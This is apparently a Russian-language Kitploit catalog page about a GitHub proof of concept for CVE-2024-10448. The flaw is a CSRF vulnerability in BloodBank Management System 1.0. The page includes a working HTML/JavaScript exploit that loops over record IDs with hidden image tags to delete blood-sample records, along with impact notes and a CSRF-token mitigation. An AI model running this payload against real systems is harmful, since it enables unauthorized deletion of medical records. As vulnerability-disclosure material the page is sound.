Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/bevennyamande/cve-2024-10448
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

POC CSRF-атаки на банк крови

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Затронутая версия:

  • BloodBank Management System: 1.0

Информация об уязвимости:

  • Тип уязвимости: Межсайтовая подделка запросов (CSRF)
  • Критичность: ВЫСОКИЙ
  • Статус: Не исправлено

Уязвимый эндпоинт:

  • Путь: /file/delete.php?bid=

Описание уязвимости:

В функции запроса крови системы BloodBank Management System была обнаружена уязвимость межсайтовой подделки запросов (CSRF). Этот дефект возникает при отправке delete-запроса на путь /file/delete.php?bid=, позволяя параметру выбирать запись для удаления в приложении. Однако являются динамическими и зависят от добавления образцов крови, поэтому для успешности запроса я использовал тег изображения, генерируемый JavaScript в цикле.

bid
bid

Успешная эксплуатация может привести к несанкционированным действиям, т.е. удалению данных от имени жертвы. Кроме того, это может быть использовано при посещении вредоносных веб-сайтов с полезной нагрузкой.


Доказательство концепции (PoC):

Ниже приведен пример CSRF PoC-атаки, которая удаляет доступные образцы крови через параметр bid; разместите файл на домене, контролируемом атакующим, в моем случае я использовал localhost:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


Видео PoC

  • видео

Воздействие:

  • Манипуляция данными: Атакующие могут изменять содержимое, отображаемое пользователям.
  • Репутационный ущерб: Пользователи могут потерять доверие к системе из-за вредоносного поведения.

Рекомендации по смягчению последствий:

  1. Используйте CSRF-токен Реализуйте механизм для предотвращения междоменного доступа или добавляйте csrf-токены в свои запросы, а также избегайте выполнения изменяющих состояние действий через GET-запросы.
Скачать инструмент